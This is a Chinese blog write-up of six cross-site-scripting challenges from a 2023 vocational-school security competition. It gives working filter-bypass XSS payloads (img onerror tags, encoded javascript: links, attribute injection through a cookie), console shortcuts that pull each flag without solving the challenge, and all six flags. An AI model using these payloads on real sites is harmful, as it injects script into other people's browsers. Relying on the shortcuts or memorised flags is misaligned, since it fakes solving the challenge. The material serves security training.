2023年中职“网络安全“—跨站脚本渗透①

该文详细介绍了六个跨站脚本(XSS)渗透测试的解题方法,涉及URL编码、HTML注入、JavaScript触发等技巧,每个解法都以获取弹框信息作为flag提交,强调了对过滤机制的理解和实战经验的重要性。
摘要由CSDN通过智能技术生成

跨站脚本渗透

任务环境说明:

 服务器场景:Server2125(关闭链接)
 服务器场景操作系统:未知

1. 访问服务器网站目录1,根据页面信息完成条件,将获取到弹框信息作为flag提交;

解法一:http://靶机IP/1/?name=</h2><img src=1 onerror=alert(1)>

解法二:F12打开控制台,输入 alert(1) 回车

解法三:F12打开控制台,输入 b64_md5('simple') 回车

flag:jb3aSPuHSNZ0bxllgk6Wag

2. 访问服务器网站目录2,根据页面信息完成条件,将获取到弹框信息作为flag提交;

解法一:http://靶机IP/2/index.php?keyword="</h2><img SRC=1 ONERROR=alert(1)>&submit=搜索

解法二:F12打开控制台,输入 alert() 回车

解法三:F12打开控制台,输入 b64_md5('relaxed') 回车

flag:gfMr4koqYvxHLMQ+3JfmWw

3. 访问服务器网站目录3,根据页面信息完成条件,将获取到弹框信息作为flag提交;

解法一:
    先把javascript:alert(1)转换成HTML编码

    (1)输入进去,回车
    (2)然后在点击友情链接

解法二:
    在url中的keyword参数后输出javas%09cript:alert(1)
    然后在点击友情链接

解法三:F12打开控制台,输入 alert() 回车

解法四:F12打开控制台,输入 b64_md5('challenge') 回车

flag:sE7ArePUm0oHnw4gfV4oIQ

4. 访问服务器网站目录4,根据页面信息完成条件,将获取到弹框信息作为flag提交;

解法一:
    使用Win7的谷歌浏览器,发现了这些

    " οnfοcus="alert(1)" type=text "
    提交Cookie后点击一下input框,就会弹出来
    其他触发事件也可以,不值可以用onfocus

解法二:F12打开控制台,输入 alert() 回车

解法三:F12打开控制台,输入 b64_md5('commonly') 回车

flag:nQO7ofm1/wzUgGBnrR55qg

5. 访问服务器网站目录5,根据页面信息完成条件,将获取到弹框信息作为flag提交;

我怀疑这题有问题,这题应该对应XSS-Labs第15关
解法一:F12打开控制台,输入 alert(1) 回车

解法二:F12打开控制台,输入 b64_md5('Uncomfortable') 回车

flag:QmRhA990viE8yP/PWbnKhw

6. 访问服务器网站目录6,根据页面信息完成条件,将获取到弹框信息作为flag提交;

解法一:http://靶机IP/6/?keyword=%3Cimg%0Asrc=1%0Dοnerrοr=alert()%3E

解法二:F12打开控制台,输入 alert() 回车

解法三:F12打开控制台,输入 b64_md5('finis') 回车

flag:LHOm3XR7ig6+hgo2Zd/Y6g

总结

这种题目考的就是过滤,只要多打靶机,做起来还是没有问题的。
XSS-Labs

  • 6
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

acaciaf

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值